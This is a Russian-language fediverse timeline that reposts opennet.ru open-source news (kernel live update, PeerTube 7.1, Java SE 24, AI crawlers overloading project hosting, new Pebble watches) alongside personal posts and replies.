Google развивает систему перезагрузки ядра без остановки работы устройств В качестве основной области применения LUO называются облачные окружения, в которых появится возможность обновления гипервизора KVM без нарушения работы запущенных виртуальных машин. В частности, можно будет приостановить виртуальные машины на время перезагрузки ядра с гипервизором, сохранив в рабочем состоянии все прикреплённые к виртуальным машинам устройства.
Для воплощения данной возможности LUO предоставляет возможности для сохранения состояния устройств до переключения на новое ядро и восстановления состояния сразу после задействования нового ядра, таким образом, что непрерывные операции системы и приложений в пространстве пользователя с устройствами не будут нарушены. В процессе перезагрузки ядра также обеспечена неразрывность выполняемых операций с DMA и активность, связанная с обработкой прерываний.
Для координации сохранения состояния и переключения на новое ядро
LUO предоставляет API, позволяющий другим подсистемам ядра подключать обработчики для отслеживания и участия в процессе Live-перезагрзки. Среди подсистем, которые могут интегрироваться с LUO, отмечены гипервизор KVM, iommu, система прерываний и драйверы. Для передачи состояния памяти от старого ядра к новому задействован KHO (Kexec HandOver). Управление производится через файлы sysfs "/sys/kernel/liveupdate/{state, prepare, finish}".
Источник: https://www.opennet.ru/opennews/art.shtml?num=62929
Things happen.
Для плат Raspberry Pi опубликован генератор системных образов rpi-image-gen Инструментарий rpi-image-gen концептуально отличается от ранее предлагаемых утилит pi-gen, рассчитанных на подготовку вариантов сборок дистрибутива Raspberry Pi OS. В rpi-image-gen система формируется с использованием концепции "коллекций" (примеры), представляющих собой подборки YAML-файлов со списками устанавливаемых пакетов и метаданными, определяющими выполняемые операции. Выбранные коллекции образуют профиль сборки. Для генерации rootfs и образов с различными ФС и раскладкой разделов в rpi-image-gen применяются утилиты bdebstrap, mmdebstrap и genimage.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62927
Опубликована децентрализованная видеовещательная платформа PeerTube 7.1 PeerTube даёт возможность запустить собственный сервер для распространения видео и подключить его к общей федеративной сети. Посетители участвуют в доставке контента и имеют возможность подписки на каналы и получения уведомлений о новых видео, независимо от того, какой именно сервер они используют. Федеративная сеть PeerTube образуется как содружество связанных между собой небольших серверов хостинга видео, на каждом из которых имеется свой администратор и приняты свои правила.
Каждый сервер с видео выполняет роль BitTorrent-трекера, размещающего учётные записи и видео пользователей. Для взаимодействия серверов в федеративной сети применяется протокол ActivityPub. Идентификатор пользователя формируются как "@имя_пользователя@домен_сервера". При просмотре видео данные по возможности загружаются через обращение к браузерам других посетителей, просматривающих тот же контент. Если запрошенное видео никто не просматривает, отдача организуется сервером, на который загружено видео (используется протокол WebSeed).
Помимо распределения трафика между пользователями, просматривающими видео, PeerTube позволяет серверам кэшировать видео других авторов. Таким образом формируется распределённая сеть не только из клиентов, но и из серверов, а также обеспечивается отказоустойчивость. Кроме распространения готового видео имеется поддержка потокового вещания (live streaming) с доставкой контента в режиме P2P. Для управления стримингом могут использоваться типовые программы, такие как OBS.
Для начала вещания через PeerTube пользователю необходимо загрузить на один из серверов видеоролик, описание и набор тегов. После этого ролик станет доступен во всей федеративной сети, а не только на сервере первичной загрузки. Для работы с PeerTube и участия в распространении контента достаточно обычного браузера. Распространять видео с использованием P2P-коммуникаций можно добавив на свой сайт специальный виджет со встроенным web-плеером, по аналогии с тем как на страницы встраиваются ролики с YouTube. Отслеживать появление видео можно через подписку на выбранные видеоканалы в федеративных социальных сетях (например, в Mastodon и Pleroma) или через RSS.
В настоящее время в федеративную сеть входит 994 сервера, поддерживаемых добровольцами и организациями. Если пользователя не устраивают правила размещения видео на определённом сервере PeerTube, он может подключиться к другому серверу или запустить свой собственный сервер. Для быстрого развёртывания сервера предоставляется преднастроенный образ в формате Docker (chocobozzz/peertube).
Изначально платформа PeerTube основывалась на применении BitTorrent-клиента WebTorrent, запускаемого в браузере и использующего технологию WebRTC для организации прямого P2P-канала связи между браузерами. Позднее вместо WebTorrent был задействован протокол HLS (HTTP Live Streaming) в связке с WebRTC, позволяющий адаптивно управлять потоком в зависимости от полосы пропускания. Web-интерфейс построен с использованием фреймворка Angular.
Основные новшества PeerTube 7.1:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62923
continue
bonked 21 Mar 2025 17:53 +0100
original: binarygolf@haunted.computer
contrinitiator
bonked 21 Mar 2025 17:43 +0100
original: Konstantin@pixelfed.de
В GCC-фронтэнде с компилятором Rust реализован Borrow checker Предложенная реализация Borrow checker отличается тем, что написана на языке Rust и предоставляет расширенные возможности верификации кода, позволяющие в ряде случаев считать безопасным (safe) код, который до сих пор требовал пометки ключевым словом Unsafe из-за ограничений применяемой по умолчанию реализации Borrow checker.
Подготовленное для GCC решение имеет ограничения:
Полная реализация самодостаточной сборки подразумевает 2-стадийную раскрутку, при которой сначала GCC соберёт gccrs без Borrow checker, а затем соберёт упомянутую реализацию Borrow checker, написанную на языке Rust, используя урезанный варианта компилятора и считая код условно-доверяемым (т.е. не выполняя проверку заимствования). После сборки Borrow checker-а будет выполнена ещё одна пересборка компилятора, но уже с выполнением проверок заимствования.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62924
Для ОС Haiku началось портирование драйвера NVIDIA и опубликован порт GIMP 3.0 Решение использовать код от компании NVIDIA, а не драйвер Nouveau, было принято исходя из лёгкости портирования - драйвер от NVIDIA спроектирован как переносимый и использующий общий код в сборках для Windows, Linux, FreeBSD и Solaris. Кроме того, драйвер NVIDIA имеет более высокое качество и лучше поддерживается.
Дополнительно можно отметить портирование для Haiku графического редактора GIMP 3.0. Порт создан Герасимом Троеглазовым (3dEyes).
Источник: https://www.opennet.ru/opennews/art.shtml?num=62926
contrinitiator
honked back 21 Mar 2025 13:21 +0100
in reply to: https://lor.sh/users/coaxial/statuses/114200352889329264
contrinitiator
honked back 21 Mar 2025 13:11 +0100
in reply to: https://honk.any-key.press/u/contrinitiator/h/cy5Yj6KnV5Dfz3324J
В случае жирных бизнес-интересов больше пол-тысячи сотрудников разных ведомств могут выйти на один объект и работать даже ночью.
contrinitiator
honked 21 Mar 2025 13:07 +0100
Питерские "силовики" расхреначили Апрашку, при этом чиновники называют это освобождением Апраксина двора, так, словно там засели какие-то враги и долго оборонялись.
Перегрузка инфраструктуры KDE, GNOME, Fedora, Codeberg и SourceHut из-за ИИ-индексаторов Проблемы возникают из-за того, что подобные ИИ-индексаторы действуют агрессивно, собирают информацию в несколько потоков и не учитывают правила доступа к контенту, заданные на сайтах через файл robots.txt. Проблему усугубляет то, что разработками в области машинного обучения занимаются большое число разных компаний по всему миру, которые пытаются собирать как можно больше данных в меру своих возможностей. Каждая компания запускает свой индексатор и все вместе они создают огромную паразитную нагрузку на элементы инфраструктуры.
После начала блокировки подобного трафика, некоторые индексаторы начали притворяться типовыми браузерами для обхода фильтрации по идентификатору User Agent и использовать распределённые сети, охватывающие большое число хостов, для преодоления ограничений интенсивности обращений с одного IP. Наиболее сильно из-за активности ИИ-индексаторов страдают инфраструктуры открытых проектов, использующих собственные хостинги Git-репозиториев, форумы и Wiki, которые изначально не были рассчитаны на обработку высокой нагрузки.
Проблемы возникли у платформы совместной разработки SourceHut, развиваемой Дрю ДеВолтом (Drew DeVault), автором пользовательского окружения Sway. Дрю сетует на то, что в очередной раз вместо того, чтобы заниматься развитием платформы ему приходится тратить большую часть своего времени на разгребание неожиданно возникших проблем. Четыре года назад проблемой для SourceHut стало использование CI-инфраструктуры для майнинга криптовалют. Два года назад пришлось разбираться с флудом запросами "git clone" из-за сервиса Go Module Mirror. В прошлом году платформа была выведена из строя на неделю из-за DDoS-атаки. Теперь возникла новая напасть - ИИ-индексаторы.
По словам Дрю, решение нескольких приоритетных задач было отложено на недели или даже месяцы из-за того, что создателей SourceHut постоянно отвлекает блокировка ИИ-ботов. Чтобы избежать сбоев правила блокировки приходится пересматривать по несколько раз в день. Для снижения запросов к ресурсоёмким обработчикам в SourceHut были внедрены ловушки на базе инструментария Nepenthes, генерирующего в ответ на запросы ботов случайный контент с зацикленными на ловушку ссылками. До этого разработчики SourceHut из-за агрессивного поведения ИИ-ботов были вынуждены заблокировать трафик из нескольких облачных платформ, включая Google Cloud Platform и Azure.
При этом введённые меры не лишены ложных срабатываний, от чего уже пострадали многие пользователи, так как внедрённая система блокировки не всегда может отличить реальных пользователей от ботов (например, возникли проблемы со сборкой пакетов для репозиториев Nix). ИИ-боты сканируют всё до чего могут дотянуться, включая ресурсоёмкие операции, такие как "git blame", перебирают каждую страницу в "git log" каждого репозитория, мимикрируя под запросы обычных пользователей, используя случайные индинтификаторы реальных браузеров (User Agent) и отправляя запросы с десятков тысяч IP, не связанных к какой-то одной подсетью.
Другие проекты, обратившие внимание на проблему:
Администраторы микроблогинговой платформы Framapiaf подготовили список блокировки, насчитывающий 460 тысяч адресов с которых зафиксирована активность ИИ-ботов. Отдельно развивается проект ai.robots.txt, собравший список идентификаторов (User Agent) ИИ-индексаторов, которые не скрывают имя бота, а также опубликовавший статистику о том, какие из ботов учитывают правила из файла robots.txt. Примеры блокировки по заголовку User-Agent предложены для Apache httpd и nginx.
Дополнительно можно отметить, ловушку для ИИ-ботов AI Labyrinth, представленную вчера компанией Cloudflare. Пользователям Cloudflare предоставлена опция, позволяющая вместо блокировки ИИ-ботов, игнорирующих запрет на индексацию, отдавать фиктивные страницы и зацикливать ботов на их обработке. Предполагается, что выдача ИИ-ботам мусорного контента заставит их разработчиков следовать правилам robots.txt и снизить интенсивность запросов. По статистике Cloudflare около 1% всего трафика в сети приходится на ИИ-ботов.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62925
continue
honked back 21 Mar 2025 11:27 +0100
in reply to: https://craba.cab/users/cybertailor/statuses/114198643975166334
Вот этот одноплатник нужно сделать роутером. Но проще с роутерера прокинуть нужные порты (80, 443 и т.п.) на одноплатник.
Заказал себе одноплатник на RiscV, хочу провести белый IP и сделать из него домашний сервер под пет проекты.
Хочу, чтобы все устройства подключённые к роутеру пользовались бы серым IP, а белый вывести только на одно устройство. Как такое делается ?
continue
bonked 21 Mar 2025 11:20 +0100
original: contrinitiator@metalhead.club
contrinitiator
honked 21 Mar 2025 10:25 +0100
Современный человек перешёл с телесного, эмпирического проживания реальности на виртуальное — внутри своей или чужой психики. Поэтому изменился характер инициации. В телесно ориентированных обществах (неиндустриализированные страны, которые остались в аграрной экономике) и сообществах (тюрьма, армия) человека инициируют по-старинке. В остальных человека инициируют через информацию, запакованную в эмоции — в контент. Проводят моментальный экскурс в инаковость и смертность человека, в противоречивую природу мира.
contrinitiator
honked back 20 Mar 2025 14:57 +0100
in reply to: https://silverbay.space/users/multed/statuses/114195045955022893
contrinitiator
honked back 20 Mar 2025 14:39 +0100
in reply to: https://silverbay.space/users/multed/statuses/114194915297325147
@multed Если вопрос, переводит ли Tusky посты - то да, переводит. Тыкнуть на троеточие, где меню для взаимодействия с постом.
Браузер Chrome переведён на шрифтовой движок Skrifa, написанный на Rust В Chrome 128 написанный на Rust бэкенд был включён в экспериментальном режиме для редко используемых форматов шрифтов, таких как CFF2 и цветные шрифты. Начиная с выпуска Chrome 133 новый бэкенд задействован для всех web-шрифтов в сборках для платформ Linux, Android и ChromeOS. На платформах Windows и macOS новый движок пока используется в качестве запасного и применяется в случае, если система не поддерживает формат шрифта, который пытается отобразить браузер.
Код Skrifa разработан инженерами Google в рамках инструментария Fontations и открыт под лицензиями MIT и Apache 2.0. Для проверки корректности работы Skrifa подготовлено около 700 unit-тестов. Помимо библиотеки Skrifa, предоставляющей API для доступа к метаданным шрифтов и загрузки контуров глифов, инструментарий Fontations включает низкоуровневые библиотеки для чтения, разбора, изменения и создания шрифтовых данных в формате OpenType. В свою очередь Fontations является частью проекта Oxidize, созданного для перевода утилит и библиотек для работы с текстом и шрифтами с компонентов на языках Python (fonttools, fontmake, nanoemoji) и C++ (HarfBuzz, FreeType) на новые реализации, написанные на Rust.
Разработка компонентов на Rust началась из-за недостаточной эффективности выявления ошибок при помощи fuzzing-тестирования, так как форматы шрифтов слишком сложны для охвата всех возможных комбинаций. Например, на прошлой неделе во FreeType была выявлена критическая уязвимость, позволяющая выполнить код при обработке специально оформленных шрифтов. Помимо движка FreeType проблемы с обеспечением безопасности могут создавать и используемые в нём зависимости, такие как bzip2, libpng и zlib.
Использование Rust позволило значительно снизить вероятность появления проблем при работе с памятью, повысить качество кода, тратить меньше времени на исправление проблем с безопасностью и ускорить внесение улучшений в возможности Chrome, связанные со шрифтами. По статистике Google и Microsoft около 70% опасных уязвимостей вызваны проблемами при работе с памятью, которых можно избежать при использовании языка Rust без unsafe-блоков.
Например, из проблем, в прошлом выявлявшихся в коде FreeType, можно было избежать проблем, связанных с обращением к освобождённым областям памяти, выходом за границу буфера, доступом к массивам без проверки индексов, целочисленными переполнениями, некорректным использованием необнулённых областей памяти и ошибками приведения типов.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62922
Релиз программы для редактирования видео LosslessCut 3.65.0 Без перекодирования программа также может решать такие задачи как прикрепление звукового трека или субтитров к видео, вырезание отдельных сцен из роликов (например, вырезание рекламы из записей телепередач), раздельное сохранение фрагментов, привязанных к меткам/главам, перегруппировка частей видео, разделение звука и видео по разным файлам, изменение типа мультимедийного контейнера (например, из MKV в MOV), сохранение в форме изображений отдельных кадров видео, создание миниатюр, экспорт фрагмента в отдельный файл, изменение метаданных (например, данных о местоположении, времени записи, горизонтальной или вертикальной ориентации). Присутствуют средства для определения и автоматического вырезания пустых областей (чёрный экран на видео и фрагменты без звука в звуковых файлах), а также привязки к изменениям сцены.
Возможно соединение фрагментов из разных файлов, но файлы должны быть закодированы с использованием идентичного кодека и параметров (например, сняты одной камерой без изменения настроек). Возможно редактирование отдельных частей с выборочным перекодированием только изменяемых данных, но с оставлением в исходном видео остальной информации, не затронутой при редактировании. В процессе редактирования поддерживается откат изменений (undo/redo) и показ лога команд FFmpeg (можно повторить типовые операции из командной строки без использования LosslessCut).
Ключевые изменения в новой версии:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62921
Выпуск miracle-wm 0.5, композитного менеджера на базе Wayland и Mir Целью miracle-wm является создание композитного сервера, применяющего мозаичное управление окнами, но более функционального и стильного, чем такие продукты, как Swayfx. При этом проект позволяет использовать и классические приёмы работы с плавающими окнами, например, можно размещать отдельные окна поверх мозаичной сетки или закреплять окна к определённому месту на рабочем столе. Поддерживается виртуальные рабочие столы с возможностью выставления для каждого рабочего стола своего режима работы с окнами по умолчанию (мозаичная компоновка или плавающие окна).
Предполагается, что miracle-wm может оказаться полезным пользователям, которые отдают предпочтение мозаичной компоновке, но желают получить визуальные эффекты и более яркое графическое оформление с плавными переходами и цветами. Конфигурация определяется в формате YAML. Для установки miracle-wm можно использовать команду "sudo snap install miracle-wm --classic".
Основные новшества:
<iframe src="https://www.youtube.com/embed/KwOp8J09Zdw?si=bPfWVwoONr4n_U4V">
Источник: https://www.opennet.ru/opennews/art.shtml?num=62918
continue
honked back 20 Mar 2025 10:16 +0100
in reply to: https://mastodon.online/users/lost_enchanter/statuses/114190966396227262
Меня все реже радует трата денег на себя, поэтому совет из личного опыта: задонать тем, кто (по твоему мнению) делает что-то важное.
С днём рождения!
continue
bonked 20 Mar 2025 10:10 +0100
original: prahou@merveilles.town
contrinitiator
bonked 20 Mar 2025 10:06 +0100
original: gusev@mastodon.ml
День весеннего равноденствия — это не только символ победы света над тьмой, но и важное астрономическое событие, когда день становится равен ночи. Этот день неизменен и не подвластен человеку. Никто не может перенести его или изменить, разве что в своём воображении. Природные явления, такие как равноденствие и солнцестояние, напоминают нам о величии и мощи природы. Они демонстрируют неустанное движение небесной механики, частью которой является наша планета Земля. Эта космическая мощь настолько великолепна, что все человеческие попытки что-либо изменить кажутся нелепыми. Земля существует уже 4,5 миллиарда лет и пережила множество изменений. Человеческая деятельность не может существенно повлиять на её судьбу, но важно понимать и ценить окружающую природу. Сегодня прекрасный день, чтобы выйти под высокое весеннее небо, где поёт жаворонок, собраться с мыслями и насладиться красотой весеннего дня.
#деньвесеннегоравноденствия
continue
bonked 20 Mar 2025 09:58 +0100
original: gusev@mastodon.ml
День весеннего равноденствия — это не только символ победы света над тьмой, но и важное астрономическое событие, когда день становится равен ночи. Этот день неизменен и не подвластен человеку. Никто не может перенести его или изменить, разве что в своём воображении. Природные явления, такие как равноденствие и солнцестояние, напоминают нам о величии и мощи природы. Они демонстрируют неустанное движение небесной механики, частью которой является наша планета Земля. Эта космическая мощь настолько великолепна, что все человеческие попытки что-либо изменить кажутся нелепыми. Земля существует уже 4,5 миллиарда лет и пережила множество изменений. Человеческая деятельность не может существенно повлиять на её судьбу, но важно понимать и ценить окружающую природу. Сегодня прекрасный день, чтобы выйти под высокое весеннее небо, где поёт жаворонок, собраться с мыслями и насладиться красотой весеннего дня.
#деньвесеннегоравноденствия
contrinitiator
honked back 20 Mar 2025 09:03 +0100
in reply to: https://mastodon.social/users/coolingfan375/statuses/114193693340466796
contrinitiator
honked 20 Mar 2025 07:06 +0100
Поздравляю с Равноденствием!
Наконец нормальный праздник в этом году.
Теперь можно и блинами полакомиться. Хотя можно было и до того, и даже после!
Птиц уже закликали, Тополя будили. Костёр сегодня не получится сделать, но что-нибудь зажжём.
Выпуск среды рабочего стола GNOME 48 Для терминалов и редакторов кода задействован моноширинный шрифт Adwaita Mono, являющийся модифицированным вариантом шрифта Iosevka, приближенным по стилю к шрифту Inter.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62916
Выпуск Java SE 24 и OpenJDK 24 Java SE 24 отнесён к категории выпусков с обычным сроком поддержки, обновления для которого будут выпускаться до следующего релиза. В качестве ветки с длительным сроком поддержки (LTS) следует использовать Java SE 21 или Java SE 17, обновления для которых будут выпускаться до 2031 и 2029 годов соответственно (общедоступные - до 2028 и 2026 годов). Расширенная поддержка LTS-ветки Java SE 8 продлится до 2030 года, а Java SE 11 - до 2032 года. Следующим LTS-релизом станет осенний выпуск Java SE 25.
Среди предложенных в Java SE 24 новшеств:
Дополнительно можно отметить публикацию обновления платформы для создания приложений с графическим интерфейсом JavaFX 24 и новый выпуск универсальной виртуальной машины GraalVM, поддерживающей запуск приложений на JavaScript (Node.js), Python, Ruby, R, любых языках для JVM (Java, Scala, Clojure, Kotlin) и языках, для которых может формироваться биткод LLVM (C, C++, Rust). Кроме поддержки JDK 24 в новой версии GraalVM проведены оптимизации для задач, связанных с машинным обучением, улучшена поддержка компиляции Java-байткода в машинный код, добавлен механизм SkipFlow для сокращения размера исполняемых файлов и уменьшения времени компиляции.
ClassFile cf = ClassFile.of();
ClassModel classModel = cf.parse(bytes);
byte[] newBytes = cf.build(classModel.thisClass().asSymbol(),
classBuilder -> {
for (ClassElement ce : classModel) {
if (!(ce instanceof MethodModel mm
&& mm.methodName().stringValue().startsWith("debug"))) {
classBuilder.with(ce);
}
}
});
jshell› Stream.of(1,2,3,4,5,6,7,8,9).gather(new WindowFixed(3)).toList()
$1 ==› [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
switch (x.getStatus()) {
case 0 -› "okay";
case 1 -› "warning";
case 2 -› "error";
case int i -› "unknown status: " + i;
}
if (i instanceof byte b) {
... b ...
}
class Outer {
void hello() {
System.out.println("Hello");
}
class Inner {
Inner() {
hello();
super();
}
}
}
// было
public class HelloWorld {
public static void main(String[] args) {
System.out.println("Hello world!");
}
}
// теперь можно
void main() {
System.out.println("Hello, World!");
}
Источник: https://www.opennet.ru/opennews/art.shtml?num=62914
Представлены две модели умных часов на открытой платформе PebbleOS Прошлые модели часов Pebble выпускались с 2013 по 2016 год и пользовались популярностью благодаря длительной автономной работе из-за экрана не базе электронной бумаги и возможности установки на часы дополнительных программ из каталога, насчитывающего более 10 тысяч приложений. В 2016 году производство и разработка часов Pebble были свёрнуты после поглощения компанией Fitbit. В 2021 году компания Fitbit была куплена корпорацией Google, которая в январе 2025 года открыла код операционной системы PebbleOS под лицензией Apache 2.0 в рамках инициативы по поддержке энтузиастов, заинтересованных в продолжении развития платформы.
Основатель Pebble воспользовался публикацией PebbleOS для возрождении проекта и разработал две новые модели часов - "Core 2 Duo" и "Core Time 2". Между собой новые модели отличаются использованием 1.26-дюймового черно-белого (144x168) и 1.5-дюймового цветного сенсорного (200x228) экрана на базе электронной бумаги, а также пластиковым и металлическим корпусом. В остальном параметры часов близки. Модель Core Time 2 доступна для предзаказа по цене $149, а Core Time 2 - $225. Производство первой модели начнётся в июле, а второй в декабре.
У часов Core 2 Duo 1.26-дюймовый черно-белый экран и корпус идентичен ранее выпускаемой модели Pebble 2. Устройство тоже доступно в черном и белом исполнении, защищено от попадания влаги (IPX8), имеет встроенный микрофон, функции отслеживания продолжительности сна и шагомер. Отличия от Pebble 2 сводятся к автономной работе в течение 30 суток, задействованием Bluetooth LE чипа Nordic nRF52840, наличием громкоговорителя, барометра, компаса, линейного резонансного привода (тише и мощнее вибромотора) и более надёжными 4 кнопками.
Модель Core Time 2 оснащена 64-цветным 1.5-дюймовым экраном на базе электронной бумаги, превышающим экран модели Pebble Time 2, выполненный по той же технологии, на 53% по размеру и на 88% по числу пикселей. Экран сенсорный и накрыт плоской стеклянной линзой, которая в отличие от изогнутой линзы часов Pebble Time 2 вносит меньше искажений и бликов. Корпус и 4 кнопки выполнены из металла. Обеспечен уровень защиты от попадания влаги IPX8. Время автономной работы заявлено в 30 дней. Помимо функций отслеживания продолжительности сна и шагомера, часы укомплектованы пульсометром. Имеется микрофон и громкоговоритель.
Новые модели созданы в соответствии со следующими принципами:
Прошивки для устройств построены на открытом коде платформы PebbleOS и поддерживают все основные возможности старых часов Pebble, такие как вывод уведомлений и сообщений со смартфона (например, уведомления о входящих звонках и событиях календаря-планировщика, информация о новых SMS, email и сообщениях из популярных мессенджеров), списки действий, смена тем оформления экрана, будильник, таймер, календарь, управление воспроизведением музыки, функции фитнес-трекера, расширение функциональности через установку приложений из каталога apps.rebble.io. Для Android и iOS будут опубликованы новые сопутствующие приложения для взаимодействия смартфона с умными часами.
Источник: https://www.opennet.ru/opennews/art.shtml?num=62913
Производительность Ubuntu-пакета jq удалось увеличить в 1.9 раза путём пересборки Итоги эксперимента:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62912
continue
bonked 19 Mar 2025 10:15 +0100
original: h3artbl33d@exquisite.tube
[2023] How OpenBSD’s malloc helps the developer - Otto Moerbeek
Otto Moerbeek: How OpenBSD's malloc helps the developer
It has been 15 years since my malloc implementation was imported into OpenBSD. It features randomization, keeping meta-data strictly separate from user data and detecting various forms of API misuse like use-after-free and writes inside the allocation but outside the requested size.
These features not only improve security but also help the developer to find bugs. We will discuss the malloc features that help the developer doing proper memory management, concentrating on memory leak detection. While available for some time, the leak detection code was not compiled in by default and cumbersome to use. Recently it was reworked to make it easier to use and it is now available by default.
Otto Moerbeek has been a OpenBSD developer for 20 years. His contributions to OpenBSD include major work on utilities like patch(1) and diff(1), new versions of dc(1) and bc(1), privilege separated tcpdump(8), work on ntpd(8) and kernel time code, unwind(8), large partition and ffs2 support, a complete rewrite of malloc(3) and work on the OpenBSD/loongson port.
Otto Moerbeek: External Attachment: https://exquisite.tube/w/4kzn4wYpbi6zxXrEX82Zrq [2023] How OpenBSD’s malloc helps the developer - Otto Moerbeek
continue
bonked 19 Mar 2025 10:13 +0100
original: oilime@infosec.exchange
continue
bonked 19 Mar 2025 10:10 +0100
original: mxjaygrant@triangletoot.party
I'm not sure where I picked up this site from, but for the last couple of weeks, whenever I've been unhappily pissed off about the state of the world, I've looked at owls in towels and felt better
continue
bonked 19 Mar 2025 10:04 +0100
original: sn4il@blog.sn4il.site
https://t.me/RepkaPitalk/40643
В проекте Repka Pi стали доступными и открытыми репозитории с исходными кодами загрузчика U-Boot (с DeviceTree) и ядра Linux (также с DT) на GitFlic — это российском аналоге GitHub.
Репозитории пока опубликованы для Repka Pi 4, скоро ожидается и для Repka Pi 3.
Repka Pi является российской альтернативой и аналогом одноплатников Raspberry Pi, выполнен в идентичном форм-факторе, включая размеры, расположение портов, крепления, распиновку 40 pin разъема. При этом Repka Pi оснащается более производительной оперативной памятью DDR, а не LP DDR, как у аналогов, что позволяет получать производительность на 15-20% выше, чем у аналогичных моделей (Raspberry Pi и других).
Repka Pi — одноплатные компьютеры отечественной разработки, со 100% локализацией производства с использованием комплектующих материковой части КНР. Применяя Repka Pi вы получаете прямые поставки без посредников из России, гарантийные обязательства, возможности сервиса, замены и ремонта, возможности адаптации под свои задачи и получения необходимых консультаций.
Загрузчик U-Boot (с DT)
https://gitflic.ru/project/npo_rbs/repka-os_boot-loader
Ядро Linux (так же с DT)
https://gitflic.ru/project/npo_rbs/repka-os_kernel
пока для Repka Pi 4, скоро будет для Repka Pi 3.
#РепкаОС #ОС #RepkaOS #OS
continue
honked back 19 Mar 2025 10:00 +0100
in reply to: https://mstdn.io/users/ale/statuses/114188253961639650
Я "Привет" отправляю вторым сообщением, если сразу перечитал первое и понял, что забыл поздороваться :)
Проект SDL3Lite развивает версию библиотеки SDL3 с поддержкой старых систем
Источник: https://www.opennet.ru/opennews/art.shtml?num=62909
Выпуск платформы OpenSilver 3.2, продолжающей развитие технологии Silverlight Изначально проект OpenSilver был нацелен на предоставление инструментария для продления жизни существующих Silverlight-приложений, после прекращения разработки и сопровождения платформы Silverlight компанией Microsoft в 2021 году, а также прекращения поддержки связанных с ней плагинов в браузерах. В OpenSilver поддерживаются все основные возможности движка Silverlight, включая полную поддержку языков C# и XAML, а также реализацию большей части API платформы, достаточную для использования таких C#-библиотек, как Telerik UI, WCF RIA Services, PRISM и MEF.
В текущем виде OpenSilver вышел за рамки прослойки для продления жизни Silverlight и может рассматриваться как самостоятельная платформа для создания новых приложений. Например, проектом развивается среда разработки, обеспечивается поддержка новых версий языка C# и платформы .NET, предоставляется совместимость с библиотеками на языке JavaScript.
В качестве основы OpenSilver задействован код открытых проектов Mono (mono-wasm) и Microsoft Blazor (часть ASP.NET Core), а для выполнения в браузере применяется компиляция приложений в промежуточный код WebAssembly. OpenSilver продолжает развитие проекта CSHTML5, позволяющего компилировать приложения C#/XAML/.NET в представление на языке JavaScript, пригодное для запуска в браузере, и расширяет его кодовую базу возможностями для компиляции C#/XAML/.NET в WebAssembly, а не в JavaScript.
В новой версии:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62911
continue
honked back 19 Mar 2025 09:58 +0100
in reply to: https://honk.any-key.press/u/opennet/h/sdrV97cv7x3VMQV1KJ
У меня при старте пустого FF выводился, я уже волноваться начал.
Устранена проблема , из-за которой запрос master-пароля выводился в ситуациях, когда он не требуется.
continue
bonked 19 Mar 2025 09:55 +0100
original: opennet@honk.any-key.press
Обновление Firefox 136.0.2. Новые требования Mozilla к удостоверяющим центрам Дополнительно можно отметить публикацию третьей версии правили хранилища корневых сертификатов Mozilla (MRSP - Mozilla Root Store Policy). Изменения вступили в силу 15 марта и нацелены на решение проблем с задержкой отзыва сертификатов удостоверяющими центрами. Добавлены новые требования для обеспечения оперативного отзыва сертификатов, убрана возможность получения отсрочки отзыва сертификатов в отдельных ситуациях и расширены условия отслеживания жизненного цикла закрытых ключей. Кроме того, добавлен пункт, запрещающий создание корневых сертификатов двойного назначения, применяемых как для сайтов, так и для почты (для TLS и S/MIME теперь должны создаваться отдельные корневые сертификаты).
Источник: https://www.opennet.ru/opennews/art.shtml?num=62906
continue
honked back 19 Mar 2025 09:51 +0100
in reply to: https://lor.sh/users/MrClon/statuses/114188111764145367
continue
honked back 19 Mar 2025 09:50 +0100
in reply to: https://lor.sh/users/MrClon/statuses/114188111764145367
@MrClon
Мне кажется, что не важно как часто здороваться, если приветсвие будет НЕ отдельным сообщением: https://nohello.net/ru/
Выпуск дистрибутива elementary OS 8.0.1 При разработке оригинальных компонентов elementary OS используется GTK3, язык Vala и собственный фреймворк Granite. В качестве основы дистрибутива используются наработки проекта Ubuntu. На уровне пакетов и поддержки репозиториев elementary OS 8.x совместим с Ubuntu 24.04. Все дополнительные приложения, предлагаемые для установки через AppCenter, а также некоторые поставляемые по умолчанию приложения упакованы с использованием формата Flatpak. Графическое окружение основано на собственной оболочке Pantheon, которая объединяет собой такие компоненты, как оконный менеджер Gala (на базе LibMutter), лаунчер Slingshot, панель управления Switchboard, верхнюю панель Wing, панель задач Dock и менеджер сессий Pantheon Greeter (на основе LightDM).
В состав окружения входит набор тесно интегрированных в единое окружение приложений, необходимых для решения задач пользователей. Среди приложений большую часть составляют собственные разработки проекта, такие как эмулятор терминала Pantheon Terminal, файловый менеджер Pantheon Files, текстовый редактор Code и музыкальный проигрыватель Music (Noise). Проектом также развиваются менеджер фотографий Pantheon Photos (ответвление от Shotwell) и почтовый клиент Mail (ответвление от Evolution).
Основные изменения:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62908
Обновление Firefox 136.0.2. Новые требования Mozilla к удостоверяющим центрам Дополнительно можно отметить публикацию третьей версии правили хранилища корневых сертификатов Mozilla (MRSP - Mozilla Root Store Policy). Изменения вступили в силу 15 марта и нацелены на решение проблем с задержкой отзыва сертификатов удостоверяющими центрами. Добавлены новые требования для обеспечения оперативного отзыва сертификатов, убрана возможность получения отсрочки отзыва сертификатов в отдельных ситуациях и расширены условия отслеживания жизненного цикла закрытых ключей. Кроме того, добавлен пункт, запрещающий создание корневых сертификатов двойного назначения, применяемых как для сайтов, так и для почты (для TLS и S/MIME теперь должны создаваться отдельные корневые сертификаты).
Источник: https://www.opennet.ru/opennews/art.shtml?num=62906
Новая стабильная версия браузера Vivaldi 7.2 Проект ставит своей задачей создание настраиваемого и функционального браузера, сохраняющего приватность данных пользователей. В число основных функций входит блокировщик слежки и рекламы, менеджеры заметок, истории и закладок, приватный режим просмотра, синхронизация, защищённая сквозным шифрованием, режим группировки вкладок, боковая панель, конфигуратор с большим числом настроек, режим горизонтального отображения вкладок, а также в тестовом режиме встроенный почтовый клиент, RSS-ридер и календарь.
В новой версии отмечены следующие улучшения:
Источник: https://www.opennet.ru/opennews/art.shtml?num=62904
